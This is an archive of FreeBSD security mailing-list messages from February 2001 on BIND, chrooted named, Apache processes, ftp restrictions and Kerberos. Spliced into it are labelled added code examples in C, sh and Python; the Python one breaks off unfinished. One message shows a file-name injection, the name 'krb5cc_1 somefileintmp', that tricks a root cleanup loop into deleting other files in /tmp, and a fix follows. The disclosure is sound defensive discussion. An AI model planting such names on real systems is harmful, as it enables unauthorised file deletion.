For more information, see the FreeBSD Handbook on your system, look for
the topic "Keeping up to date with CVSup."

--
            "Where am I, and what am I doing in this handbasket?"

Wes Peters                                                         Softweyr LLC
wes@softweyr.com                                           http://softweyr.com/

From owner-freebsd-security Thu Feb 1 22:31:18 2001
Date: Fri, 2 Feb 2001 01:30:57 -0500
From: Will Andrews
To: Wes Peters
Cc: Roger Marquis, security@FreeBSD.ORG
Subject: Re: bind8.2.3 and installation problem
Message-ID: <20010202013057.P479@puck.firepipe.net>
References: <3A771A88.6F71AA2E@softweyr.com>
In-Reply-To: <3A771A88.6F71AA2E@softweyr.com>; from wes@softweyr.com on Tue, Jan 30, 2001 at 12:48:24PM -0700

On Tue, Jan 30, 2001 at 12:48:24PM -0700, Wes Peters wrote:
> Or, for an upgrade,
>
>   make deinstall reinstall

Actually, it's more like this:

  [ update ]
  make clean deinstall
  make install

The 'reinstall' target doesn't work like you think.  If you have an old
work directory it will just reinstall that.

But anyway, I agree about what you said regarding QA.
:-)

--
wca

From owner-freebsd-security Thu Feb 1 22:31:49 2001
Date: Fri, 2 Feb 2001 12:31:10 +0600 (NOVT)
From: "Yuri A. Wolf"
To: Wes Peters
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: bind8.2.3 - where is the correct place to download src?
In-Reply-To: <3A7A47B7.242E4053@softweyr.com>

On Thu, 1 Feb 2001, Wes Peters wrote:

> "Yuri A. Wolf" wrote:
> > actually I just checked there is bind-8.2.2.p7 in title at
> > http://www.FreeBSD.org/ports/net.html and links to 8.2.3 on ftp.isc.org
> >
> > that's why i asked
> > well, i'll try to download and make port again... but I'm not sure changes
> > made...
>
> You can download and make the same port over and over again and it will
> never change.  If you want to get the updated version, you will need to
> update the port kit on your system, using CVSup or something like that.
> For more information, see the FreeBSD Handbook on your system, look for
> the topic "Keeping up to date with CVSup."
>
> --

Well, actually there were changes...

I use FreeBSD-3.4-Stable on one of my computers here and I have the ports
collection from one of the 4.x Releases...  So, when I downloaded the port
for bind-8 there, the 'patch-ac' differed from the one I had.  And that
evening 'make' failed...

The next morning I updated the port again and did everything the same way.
All was okay - at the 'patch' stage.

I just compared those files - the new one and the same file in the old
ports: well - they are different, but I think the differences are not the
ones that were there when I downloaded the new port the first time, or
maybe the reason is all in the shaman's nature and Siberian weather =))

In any case, thank you for the answer.  It's always a pleasure to have in
mind the idea that people here really help each other to be always alert.

--
Yuri A. Wolf
wolf@OBK.ru
#Unix System Administrator

From owner-freebsd-security Thu Feb 1 23:09:58 2001
Date: Fri, 2 Feb 2001 09:08:01 +0200
From: Peter Pentchev
To: disassembled
Cc: Sam Wun, "Thomas T. Veldhouse", freebsd-security@FreeBSD.ORG
Subject: Re: ipmon and periodic
Message-ID: <20010202090801.A328@ringworld.oblivion.bg>
References: <3A7A180F.518292C1@esec.com.au>

On Thu, Feb 01, 2001 at 08:56:14PM -0600, disassembled wrote:
>
> struct packet {
>         struct tcp_header foo;
>         struct ip_header var;
> };

Mmmm I thought the IP header came before the TCP header? :)

G'luck,
Peter

--
I am the thought you are now thinking.

> If you want to get the size of a tcp packet, (in the pseudo code above
> that's a valid example)
>
> the size of your tcp packet in bytes would be equal to:
>
> sizeof(packet); /* if you are familiar with C that is */
>
> is generally a good place to start.
>
> hope this helps
>
>
>
> On Fri, 2 Feb 2001, Sam Wun wrote:
>
> > Hi,
> >
> > does anyone know how to convert a packet to number of bytes?
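The question in this thread is how to turn a packet into a number of bytes, and the answer given uses sizeof on a fixed struct, which only counts the two headers. The following added C example (not code from the list) instead reads the sizes from the IPv4 header's own IHL and Total Length fields and the TCP data offset, so options and payload are counted and the IP header is taken first, as Peter notes; the sample packet is constructed inline and the checksums in it are not validated.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Byte counts taken from the headers of an IPv4/TCP packet. On the wire the IP
 * header comes first, then the TCP header, then the application payload. */
struct pkt_sizes {
    size_t ip_hdr_len;   /* IHL * 4; includes any IP options */
    size_t ip_total_len; /* IP "Total Length": IP header + TCP header + payload */
    size_t tcp_hdr_len;  /* TCP data offset * 4; includes any TCP options */
    size_t payload_len;  /* application data carried by this segment */
};

/* Parse buflen bytes of a captured packet starting at the IPv4 header.
 * Returns 0 and fills *out on success, -1 if the buffer is not a complete,
 * self-consistent IPv4/TCP packet (wrong version, truncated, bad lengths).
 * Checksums are not validated. */
int packet_sizes(const uint8_t *buf, size_t buflen, struct pkt_sizes *out)
{
    if (buflen < 20 || (buf[0] >> 4) != 4)         /* need a minimum IPv4 header */
        return -1;
    size_t ihl = (size_t)(buf[0] & 0x0f) * 4;      /* IP header length in bytes */
    if (ihl < 20 || ihl > buflen)
        return -1;
    size_t total = ((size_t)buf[2] << 8) | buf[3]; /* Total Length is big-endian */
    if (total < ihl || total > buflen)             /* bogus length or truncated capture */
        return -1;
    if (buf[9] != 6)                               /* Protocol 6 = TCP */
        return -1;
    if (total - ihl < 20)                          /* room for a minimum TCP header? */
        return -1;
    const uint8_t *tcp = buf + ihl;
    size_t doff = (size_t)(tcp[12] >> 4) * 4;      /* TCP data offset in bytes */
    if (doff < 20 || doff > total - ihl)
        return -1;
    out->ip_hdr_len = ihl;
    out->ip_total_len = total;
    out->tcp_hdr_len = doff;
    out->payload_len = total - ihl - doff;
    return 0;
}

/* Constructed sample packet (not a real capture): 20-byte IPv4 header, 20-byte
 * TCP header and a 5-byte payload, 45 bytes in all. Copies it into buf
 * (which must hold at least 45 bytes) and returns its length. */
size_t sample_packet(uint8_t *buf)
{
    static const uint8_t pkt[] = {
        /* IPv4: version 4, IHL 5, total length 45, id 0x1234, DF, TTL 64, proto 6 */
        0x45, 0x00, 0x00, 0x2d, 0x12, 0x34, 0x40, 0x00, 0x40, 0x06, 0x00, 0x00,
        192, 0, 2, 1,       /* source 192.0.2.1 (documentation address) */
        198, 51, 100, 2,    /* destination 198.51.100.2 (documentation address) */
        /* TCP: port 1234 -> 80, seq/ack 0, data offset 5, flags PSH|ACK, window 8192 */
        0x04, 0xd2, 0x00, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x50, 0x18, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00,
        'H', 'E', 'L', 'L', 'O'
    };
    memcpy(buf, pkt, sizeof pkt);
    return sizeof pkt;
}

/* Helpers that run the parser over the sample so the results can be checked. */
long sample_total_len(void)
{
    uint8_t buf[64];
    struct pkt_sizes s;
    size_t n = sample_packet(buf);
    return packet_sizes(buf, n, &s) == 0 ? (long)s.ip_total_len : -1;
}

long sample_payload_len(void)
{
    uint8_t buf[64];
    struct pkt_sizes s;
    size_t n = sample_packet(buf);
    return packet_sizes(buf, n, &s) == 0 ? (long)s.payload_len : -1;
}

/* A capture cut short of the IP Total Length is rejected rather than miscounted. */
int truncated_sample_rejected(void)
{
    uint8_t buf[64];
    struct pkt_sizes s;
    sample_packet(buf);
    return packet_sizes(buf, 30, &s);
}

int main(void)
{
    uint8_t buf[64];
    struct pkt_sizes s;
    size_t n = sample_packet(buf);
    if (packet_sizes(buf, n, &s) != 0) {
        puts("not a well-formed IPv4/TCP packet");
        return 1;
    }
    printf("IP header %zu, TCP header %zu, payload %zu, total %zu bytes\n",
           s.ip_hdr_len, s.tcp_hdr_len, s.payload_len, s.ip_total_len);
    return 0;
}
```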
From owner-freebsd-security Fri Feb 2 02:05:23 2001
Date: Fri, 2 Feb 2001 13:03:42 +0300
From: Roman Gnatenko
To: FengYue
Cc: Dag-Erling Smorgrav, Rossen Raykov, freebsd-security@FreeBSD.ORG
Subject: Re: Running named in chroot env
Message-ID: <20010202130342.C92089@zenon.net>

Hi,

On Thu, Feb 01, 2001 at 09:26:06AM -0800, FengYue wrote:
>
> On 1 Feb 2001, Dag-Erling Smorgrav wrote:
> > Only if your named.conf has 'directory "/";' in the options section,
> > and you don't have any slave zones, and you're not interested in any
> > log messages your name server produces. Come to think of it, the fact
> > that named is now unable to log error messages is probably the reason
> > why you think it works just fine :)
>
> Yes, it doesn't have any slave zones, but I do miss the logs.
>
> I will use your patch then:)
>
> BTW, you have a typo for the link:
>
> http://people.freebsd.org/~des/software/>
>
> there is an extra '>' after software/
>
> Thanks...
>

The configuration below has always worked fine for me; I run named with
the -t option:

options {
        directory "/";
        pid-file "/run/named.pid";
        named-xfer "/bin/named-xfer";
        listen-on { 123.4.5.7; 127.0.0.1; };
        transfer-source 123.4.5.7;
        query-source address 123.4.5.7 port 53;
        allow-transfer { my_acl; };
};

Just compile named-xfer with -static and place it in your /chroot/bin.
To see what your named is doing, insert a section like this into your
named.conf:

logging {
        channel errchannel {
                file "log/errors";
                severity info;
                print-time yes;
                print-category yes;
                print-severity yes;
        };
        category default { errchannel; };
};

All files in /chroot must be root-owned, except the directory where bind
places secondary zones.

--
Roman Gnatenko
Zenon N.S.P

From owner-freebsd-security Fri Feb 2 02:55:41 2001
Date: Fri, 2 Feb 2001 11:55:22 +0100 (CET)
From: Michal Mertl
To: security@freebsd.org
Subject: strange dropped packets

I've installed and configured several FreeBSD boxes (>=4.1).  On all of
them I use log_in_vain="YES" in rc.conf.  Sometimes I also install
ipfilter (with rules with minimal holes in inbound and outbound traffic,
with "keep state").

Either with ipfilter installed or not I see dropped packets in
/var/log/messages (result of log_in_vain) which seem to me like the last
packets of regular communications opened from inside (either UDP (dns
queries) or TCP (mostly web)).

It doesn't stop anything from working but I'm curious what it may mean.
I think sometimes FreeBSD thinks a tcp or udp connection is closed when
the other end doesn't think so (and because the packets aren't caught by
ipfilter I suspect the problem is on FreeBSD's side).

--
Michal Mertl
mime@traveller.cz

From owner-freebsd-security Fri Feb 2 03:22:53 2001
Message-Id: <200102021120.f12BK2W25943@mobile.wemm.org>
To: Sheldon Hearn
Cc: Stu Pidaso, "Jacques A. Vidrine", freebsd-security@FreeBSD.ORG
Subject: Re: cvs commit: src/usr.bin/login login.c
In-Reply-To: <7897.980850042@axl.fw.uunet.co.za>
Date: Fri, 02 Feb 2001 03:20:02 -0800
From: Peter Wemm

Sheldon Hearn wrote:
>
>
> On Tue, 30 Jan 2001 05:08:09 EST, Stu Pidaso wrote:
>
> > > # Destroy all stale Kerberos5 tickets
> > > #
> > > for i in `find /tmp -name 'krb5cc_*' -ctime +1 -print` ; do
> > >         rm -f $i
> > > done
> >
> > and now you can delete any file in /tmp.
> >
> > touch 'krb5cc_1 somefileintmp' and wait.
>
> Well spotted.
>
>   find /tmp -name 'krb5cc_*' -ctime +1 -exec rm -f {} \;
>
> I don't use -delete because it's not portable.
>
> Of course, the problem is that maximum ticket lifetime is a site-
> configurable value, which is why it _doesn't_ make sense to put this job
> in /etc/crontab in the base system.
>
> The problem is that you can end up with a large number of stale files in
> /tmp if you rely on users to run kdestroy religiously.

Well, if the patches to add proper PAM session support to login etc get
committed then there is an opportunity for the end-of-session cleanup to
do this automatically.

Cheers,
-Peter
--
Peter Wemm - peter@FreeBSD.org; peter@yahoo-inc.com; peter@netplex.com.au
"All of this is for nothing if we don't go to the stars" - JMS/B5

From owner-freebsd-security Fri Feb 2 04:25:44 2001
Date: Fri, 2 Feb 2001 13:25:04 +0100
From: Guido van Rooij
To: Matt Dillon
Cc: Alfred Perlstein, Brian Behlendorf, Roman Shterenzon, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Message-ID: <20010202132503.A2065@eniac.mpn.cp.philips.com>
References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net> <200101312305.f0VN5vJ19469@earth.backplane.com>
In-Reply-To: <200101312305.f0VN5vJ19469@earth.backplane.com>; from dillon@earth.backplane.com on Wed, Jan 31, 2001 at 03:05:57PM -0800
Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 31, 2001 at 03:05:57PM -0800, Matt Dillon wrote: > Quite a few people have been using the sandbox options in the > last year without any ill effects (I was the original author of > the feature). The only issue is that you cannot HUP named (it will > not be able to rebind its sockets), you can only restart it, and > you have to supply the proper options to ndc when restarting it > (-u bind -g bind). I usually restart it anyway (I don't trust the > named HUP code). > IIRC you also should run syslogd such that named can log in the sandbox, e.g. with syslogd -l /sandbox/var/run/log -Guido To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 6:46:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from axp5.physik.fu-berlin.de (axp5.physik.fu-berlin.de [160.45.34.3]) by hub.freebsd.org (Postfix) with ESMTP id 8565D37B4EC for ; Fri, 2 Feb 2001 06:46:05 -0800 (PST) Received: from garfield.physik.fu-berlin.de (garfield.physik.fu-berlin.de [160.45.32.188]) by axp5.physik.fu-berlin.de (8.9.1a/8.9.1) with ESMTP id PAA07211 for ; Fri, 2 Feb 2001 15:46:02 +0100 (MET) Received: from localhost (stanciu@localhost) by garfield.physik.fu-berlin.de (8.11.1/8.9.3) with ESMTP id f12EjvQ06473 for ; Fri, 2 Feb 2001 15:46:01 +0100 (CET) (envelope-from stanciu@garfield.physik.fu-berlin.de) Date: Fri, 2 Feb 2001 15:45:57 +0100 (CET) From: Dacian Stanciu To: Subject: subscribe Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 9:51:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from harrier.prod.itd.earthlink.net (harrier.prod.itd.earthlink.net [207.217.121.12]) by 
Date: Fri, 2 Feb 2001 12:50:21 -0500
From: "Richard Ward"
Subject: Apache uid/gid

I'm not too sure this has anything to do with actual FreeBSD security,
though it has been on my mind for some time. I'm running Apache 1.3.12 and
it's binding to user and group id "nobody". When I start Apache with
apachectl, it spawns the number of daemons listed in httpd.conf, though one
of those spawns is running as root. I can kill the process running as root
and all is well.

My question is: Is this a threat? Having this mystery process that's not
binding to the correct uid/gid specified, does it defeat the whole purpose
of binding Apache to its own user/group?

Thanks.
--
Richard Ward, CEO
richard@neonsky.net
Neonsky Internet Services

From owner-freebsd-security Fri Feb 2 9:54:15 2001
Date: Fri, 2 Feb 2001 10:53:46 -0700 (MST)
From: "David G. Andersen"
To: mh@neonsky.net (Richard Ward)
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apache uid/gid

The process running as root is the master process. Don't kill it, don't
step on it, it's doing what you want. It doesn't handle requests; the
non-root children do.

You're right, btw - this has nothing to do with FreeBSD security. :)

-Dave
--
work: dga@lcs.mit.edu   me: dga@pobox.com
MIT Laboratory for Computer Science   http://www.angio.net/

From owner-freebsd-security Fri Feb 2 9:57:06 2001
Date: Fri, 2 Feb 2001 12:56:42 -0500
From: "Richard Ward"
To: "David G. Andersen"
Subject: Re: Apache uid/gid

It doesn't handle requests? That's something I didn't know. Thanks for
shedding light on this, and sorry to those who are also saying "This has
nothing to do with FreeBSD security".
From owner-freebsd-security Fri Feb 2 11:31:21 2001
Date: Fri, 2 Feb 2001 14:30:55 -0500
From: Andrew Barros
To: Richard Ward
Cc: "David G. Andersen", freebsd-security@FreeBSD.ORG
Subject: Re: Apache uid/gid
You need to be root to open ports lower than 1024; this root-owned process
only opens the port, reads config files, and spawns children (with the
correct uid).

-ajb
--
Andrew Barros
PGP Key Fingerprint: D3B8 0800 C45A 143E 5CF0 E112 0A1B AB36 B655 1FB8

From owner-freebsd-security Fri Feb 2 11:47:13 2001
Date: Fri, 2 Feb 2001 11:47:57 -0800
From: "jeff"
Subject: ftp
I'm looking for an ftp client that will keep the user in their home dir.
A lot of the new ftp software is letting users browse the server's other
dirs. Any scripts I can use that would handle this issue?

Jeff Gray
cfm
From owner-freebsd-security Fri Feb 2 11:50:44 2001
Date: Fri, 2 Feb 2001 14:50:39 -0500 (EST)
From: Rob Simmons
To: jeff
Cc: security@FreeBSD.ORG
Subject: Re: ftp

???? The server is what governs where the user can browse. Read the man
page for ftpd; you will find that /etc/ftpchroot controls which users are
restricted to their home directory.
Robert Simmons
Systems Administrator
http://www.wlcg.com/

From owner-freebsd-security Fri Feb 2 11:54:57 2001
Date: Fri, 2 Feb 2001 11:54:36 -0800 (PST)
From: Benjamin Ossei
To: Rob Simmons, jeff
Cc: security@FreeBSD.ORG
Subject: Re: ftp
Reply-To: ben@cahostnet.net

By default every user has rights to their own home directory, unless the
server isn't set correctly. Also, if they happen to browse, they shouldn't
be able to go into anyone else's directory.
From owner-freebsd-security Fri Feb 2 12:03:24 2001
Date: Fri, 2 Feb 2001 15:03:21 -0500 (EST)
From: Rob Simmons
To: Benjamin Ossei
Cc: jeff, security@FreeBSD.ORG
Subject: Re: ftp

No, they can go into other people's directories by default. The default
umask on FreeBSD is 022, which means that all users' files (with certain
exceptions like .rhosts and others) are 644 and directories are 755, both
of which are world-readable. I typically change the umask for my account
to 027; that way others in the wheel group can see files I create, but
others cannot.

For more information on the way modes work, you should read the chmod and
umask man pages.
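The umask arithmetic in the message above, as an added example that is not part of the thread: a POSIX sh script that computes the file and directory modes a given umask yields and lists which home directories under a given path any local user (or a non-chrooted ftp login) can read or enter. The directory tree it builds under mktemp is constructed for the demo; no real /home is touched.

```shell
#!/bin/sh
# Added example, not part of the thread: the umask arithmetic from the
# message above as a check, plus an audit of which home directories are
# readable by "other", which is what a non-chrooted ftp login can browse.

# mode_for_umask BASE UMASK: octal mode a newly created object gets,
# i.e. BASE & ~UMASK. The kernel uses base 666 for files, 777 for
# directories. A leading 0 makes the shell parse the arguments as octal.
mode_for_umask() {
    printf '%03o' $(( 0$1 & ~0$2 ))
}

file_mode_for_umask() { mode_for_umask 666 "$1"; }   # 022 -> 644, 027 -> 640
dir_mode_for_umask()  { mode_for_umask 777 "$1"; }   # 022 -> 755, 027 -> 750

# umask_is_private UMASK: succeeds when the umask clears all "other" bits,
# so nothing the user creates is world-readable or world-searchable.
umask_is_private() {
    [ $(( 0$1 & 7 )) -eq 7 ]
}

# world_accessible_homes DIR: print each immediate subdirectory of DIR with
# the other-read or other-execute bit set, one per line, sorted.
# Octal -perm tests are used because both BSD and GNU find accept them.
world_accessible_homes() {
    find "$1" -mindepth 1 -maxdepth 1 -type d \( -perm -004 -o -perm -001 \) | sort
}

# Demo on a constructed tree (not a real /home): "alice" has the 755 that
# umask 022 gives, "bob" the 750 that umask 027 gives.
demo() {
    tmp=$(mktemp -d) || return 1
    mkdir "$tmp/alice" "$tmp/bob"
    chmod "$(dir_mode_for_umask 022)" "$tmp/alice"
    chmod "$(dir_mode_for_umask 027)" "$tmp/bob"
    for u in 022 027; do
        echo "umask $u: files $(file_mode_for_umask $u), dirs $(dir_mode_for_umask $u)"
    done
    echo "home directories under $tmp that any local user can browse:"
    world_accessible_homes "$tmp"          # lists only alice
    rm -rf "$tmp"
}

demo
```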
From owner-freebsd-security Fri Feb 2 12:13:24 2001
Date: Fri, 2 Feb 2001 15:11:48 -0500
From: "Will Mitayai Keeso Rowe"
To: "Rob Simmons", "Benjamin Ossei"
Cc: "jeff"
Subject: RE: ftp
Another way is to use wu-ftpd, and "man ftpaccess"
From owner-freebsd-security Fri Feb 2 12:16:36 2001
Date: Fri, 2 Feb 2001 15:16:13 -0500 (EST)
From: Matt Heckaman
To: Will Mitayai Keeso Rowe
Cc: Rob Simmons
Subject: RE: ftp

On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote:
> Another way is to use wu-ftpd, and "man ftpaccess"

Otherwise known as root-exploits-R-us :)

* Matt Heckaman - mailto:matt@lucida.ca   http://www.lucida.ca/pgp *
* GPG fingerprint - 53CA 8320 C8F6 32ED 9DDF 036E 3171 C093 4AD3 1364 *

From owner-freebsd-security Fri Feb 2 12:22:56 2001
Date: Fri, 2 Feb 2001 15:21:30 -0500
From: "Will Mitayai Keeso Rowe"
To: "Matt Heckaman"
Cc: "Rob Simmons"
Subject: RE: ftp

Unfair. All known bugs have been fixed.
From owner-freebsd-security Fri Feb 2 12:23:09 2001
Date: Fri, 2 Feb 2001 15:22:56 -0500 (EST)
From: Rob Simmons
To: Will Mitayai Keeso Rowe
Cc: Benjamin Ossei, jeff, security@FreeBSD.ORG
Subject: RE: ftp

I wouldn't use wu-ftp if I were you. It has a history of nasty remote
exploits.
From owner-freebsd-security Fri Feb 2 12:24:06 2001
Date: Fri, 2 Feb 2001 15:22:42 -0500
From: "Will Mitayai Keeso Rowe"
To: "Matt Heckaman"
Cc: "Rob Simmons"
Subject: RE: ftp

Besides, I notice you're using Pine ;-P

From owner-freebsd-security Fri Feb 2 12:24:59 2001
Date: Fri, 2 Feb 2001 15:25:21 -0500 (EST)
From: Rob Simmons
To: Will Mitayai Keeso Rowe
Cc: Matt Heckaman, security@FreeBSD.ORG
Subject: RE: ftp

They said that about bind...........
And sendmail........................

Unless there is a specific feature that you are looking to use proftpd or
wu-ftpd for, there is no reason to use them. The native FreeBSD ftpd is
quite good, and simple.
On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote:
> Unfair. All known bugs have been fixed.

From owner-freebsd-security Fri Feb 2 12:28:52 2001
Date: Fri, 2 Feb 2001 15:29:14 -0500 (EST)
From: Rob Simmons
To: Will Mitayai Keeso Rowe
Cc: Matt Heckaman, security@FreeBSD.ORG
Subject: RE: ftp

Local services like pine are different from daemons that listen on ports
and can have potential remote exploits.
>;-D

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote:

> besides, i notice you're using Pine ;-P
>
> :-----Original Message-----
> :From: Matt Heckaman [mailto:matt@LUCIDA.CA]
> :Sent: February 2, 2001 15:16 PM
> :To: Will Mitayai Keeso Rowe
> :Cc: Rob Simmons; security@FreeBSD.ORG
> :Subject: RE: ftp
> :Importance: High
> :
> :On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote:
> :
> :: Another way is to use wu-ftpd, and "man ftpaccess"
> :
> :Otherwise known as root-exploits-R-us :)

From owner-freebsd-security Fri Feb 2 12:31:55 2001
Date: Fri, 2 Feb 2001 15:31:32 -0500 (EST)
From: Matt Heckaman
To: Will Mitayai Keeso Rowe
Cc: Rob Simmons,
Subject: RE: ftp

On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote:

: besides, i notice you're using Pine ;-P

Yep, on a user account that has nothing of value, not running as root. You're totally right though, pine is an absolute and total mess, I really should devote some time into using a real mailer like mutt. :)

I apologize though, you're right about the wuftpd comment being unfair. Sometimes I neglect to think before hitting send. I guess I never liked wu-ftpd even without the prior bugs, I find proftpd's apache-ish config style much better for my situation. It hasn't had a flawless record either though. I guess the only safe way to go is the freebsd ftpd, but it just isn't as flexible as proftpd is. :(

On the other hand, I also run bind, albeit in a chroot as a non root user, sometimes ease of use wins out at times, I can't even begin to think how I would handle a migration to something like djbdns, though I'm hopeful that bind 9 will be much better in a few point releases. :)

* Matt Heckaman - mailto:matt@lucida.ca http://www.lucida.ca/pgp *
* GPG fingerprint - 53CA 8320 C8F6 32ED 9DDF 036E 3171 C093 4AD3 1364 *

From owner-freebsd-security Fri Feb 2 12:50:15 2001
Date: Fri, 2 Feb 2001 15:49:44 -0500 (EST)
From: Garrett Wollman
Message-Id: <200102022049.PAA90372@khavrinen.lcs.mit.edu>
To: Rob Simmons
Cc: security@FreeBSD.ORG
Subject: RE: ftp

< said:
> I wouldn't use wu-ftp if I were you. It has a history of nasty remote
> exploits.

So does UNIX, by that score.

-GAWollman

From owner-freebsd-security Fri Feb 2 13:25:12 2001
Date: Fri, 2 Feb 2001 15:24:55 -0600 (CST)
From: Mike Silbersack
To: Rob Simmons
Cc: Will Mitayai Keeso Rowe, Matt Heckaman,
Subject: RE: ftp

On Fri, 2 Feb 2001, Rob Simmons wrote:

> local services like pine are different than daemons that listen on ports
> and can have potential remote exploits.
>;-D
>
> Robert Simmons
> Systems Administrator
> http://www.wlcg.com/

Well... you're running 4.21, which has a known exploit. You should at least upgrade to the current version.
Mike "Silby" Silbersack

From owner-freebsd-security Fri Feb 2 15:48:28 2001
Date: Sat, 3 Feb 2001 02:50:31 +0300
From: hellman
X-Mailer: The Bat! (v1.47 Halloween Edition) Personal
Message-ID: <13928090054.20010203025031@artofit.com>
To: freebsd-security@freebsd.org

subscribe freebsd-security

From owner-freebsd-security Fri Feb 2 15:53:02 2001
Date: Sat, 3 Feb 2001 01:50:21 +0200
From: Peter Pentchev
To: hellman
Cc: freebsd-security@freebsd.org
Subject: Re: your mail
Message-ID: <20010203015020.E53956@ringworld.oblivion.bg>
References: <13928090054.20010203025031@artofit.com>
User-Agent: Mutt/1.2.5i
In-Reply-To: <13928090054.20010203025031@artofit.com>; from sec@artofit.com on Sat, Feb 03, 2001 at 02:50:31AM +0300

On Sat, Feb 03, 2001 at 02:50:31AM +0300, hellman wrote:
> subscribe freebsd-security

This might work better if you send it to majordomo@FreeBSD.org, not to the list itself.

G'luck,
Peter

-- 
This sentence contradicts itself - or rather - well, no, actually it doesn't!

From owner-freebsd-security Fri Feb 2 15:54:00 2001
Date: Sat, 3 Feb 2001 01:51:47 +0200
From: Peter Pentchev
To: freebsd-security@freebsd.org
Subject: Re: your mail
Message-ID: <20010203015146.F53956@ringworld.oblivion.bg>
References: <13928090054.20010203025031@artofit.com> <20010203015020.E53956@ringworld.oblivion.bg>
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010203015020.E53956@ringworld.oblivion.bg>; from roam@orbitel.bg on Sat, Feb 03, 2001 at 01:50:21AM +0200

On Sat, Feb 03, 2001 at 01:50:21AM +0200, Peter Pentchev wrote:
> On Sat, Feb 03, 2001 at 02:50:31AM +0300, hellman wrote:
> > subscribe freebsd-security
>
> This might work better if you send it to majordomo@FreeBSD.org,
> not to the list itself.

*sigh* sorry, list; wrong reply key.

G'luck,
Peter

-- 
If the meanings of 'true' and 'false' were switched, then this sentence wouldn't be false.
From owner-freebsd-security Fri Feb 2 18:15:01 2001
Date: Fri, 2 Feb 2001 21:14:38 -0500 (EST)
From: Robert Watson
To: "Brian F. Feldman"
Cc: security@FreeBSD.org, assar@FreeBSD.org
Subject: Re: PAM/SSH and KerberosIV?
In-Reply-To: <200101310049.f0V0n1f15852@green.dyndns.org>

On Tue, 30 Jan 2001, Brian F. Feldman wrote:

> I don't know. I do not have the capacity to test Kerberos without going
> through the trouble of setting it up for only myself only on my own
> computer, which would be an exercise in utterly profound useless effort.
> So, anyone who does it, let me know if it works for you and how.

If you need to test your code in an existing kerberos realm, remember that both FreeBSD.org and watson.org use kerberos, and it would be easy to arrange for a principal for one of your hosts.

I ran through the tests, and the following occurs: without the pam_kerberosIV.so entry in /etc/pam.conf, you cannot log in using kerberos. I've committed a commented out pam_kerberosIV.so entry for sshd to match the others in pam.conf in -CURRENT. I'll MFC to -STABLE sometime soon if there are no complaints. This appears to remedy the failure of Kerberos passwords to work, which is not unexpected :-).

However, this seems to have broken using unique kerberos ticket filenames for each session -- now it always uses /tmp/tkt1000 for uid 1000, rather than /tmp/tkt1000_randomnumber, meaning that if you log in twice, the first logout hoses the tickets for the second session. This didn't happen previously, and is probably an issue with pam_kerberosIV.so that I didn't run into previously since I always logged in via SSH. It's probably not a security hole as presumably KTH does the right thing with regards to O_EXCL and so on, but it's not ideal.

> BTW, you ever test the make-ssh-use-/dev/tty-to-ask-for-OTP patch?

Nope, need to do that. I'll apply it on my local tree tonight and hopefully get a chance to test it this weekend or Monday.

BTW, at one point I think you committed some fixes relating to SSH sessions crashing (I think it was the tunnel closing bug?); were those from the base OpenSSH tree, or should we be submitting them back to the openssh-unix-dev mailing list?

Robert N M Watson             FreeBSD Core Team, TrustedBSD Project
robert@fledge.watson.org      NAI Labs, Safeport Network Services

From owner-freebsd-security Fri Feb 2 19:09:57 2001
Date: Fri, 2 Feb 2001 19:09:02 -0800
From: "Seamus.Venasse"
To:
Subject:
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
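The ticket-cache naming problem Robert describes above (one fixed /tmp/tkt<uid> shared by every login, versus /tmp/tkt<uid>_<random> per session, each created with O_EXCL), modelled in Python as an added example; it is not code from the thread or from KTH Kerberos, and the open/unlink sequence, the file names and the use of a throwaway directory instead of /tmp are assumptions made for the demo.

```python
"""Kerberos IV ticket cache naming: one file per uid vs. one per session.

Added example, not code from the thread or from KTH Kerberos.  The two
naming schemes, the open()/unlink() sequence a login and a logout perform,
and the throwaway directory instead of /tmp are assumptions made for the
demo; the O_EXCL create is the protection the message alludes to.
"""
import os
import secrets
import tempfile


def open_exclusive(path):
    """Create `path` atomically with mode 0600, refusing if it exists.

    O_CREAT|O_EXCL fails with EEXIST instead of following a symlink or
    truncating a file someone else left in the shared tmp directory.
    Returns a file descriptor, or None on EEXIST.
    """
    try:
        return os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    except FileExistsError:
        return None


def login_fixed_name(tmpdir, uid):
    """The scheme the message complains about: every session uses tkt<uid>.

    A second login finds the cache already present.  A fresh login cannot
    trust its contents, so it throws the old cache away and recreates it
    (still with O_EXCL).  Both sessions now share one path.
    """
    path = os.path.join(tmpdir, f"tkt{uid}")
    fd = open_exclusive(path)
    if fd is None:
        os.unlink(path)             # take over the earlier session's cache
        fd = open_exclusive(path)
    return path, fd


def login_session_name(tmpdir, uid, attempts=64):
    """Per-session scheme: tkt<uid>_<random>, retried until O_EXCL succeeds."""
    for _ in range(attempts):
        path = os.path.join(tmpdir, f"tkt{uid}_{secrets.randbelow(10**9)}")
        fd = open_exclusive(path)
        if fd is not None:
            return path, fd
    raise FileExistsError("could not allocate a unique ticket file")


def logout(path, fd):
    """kdestroy-style cleanup: close and remove this session's cache."""
    os.close(fd)
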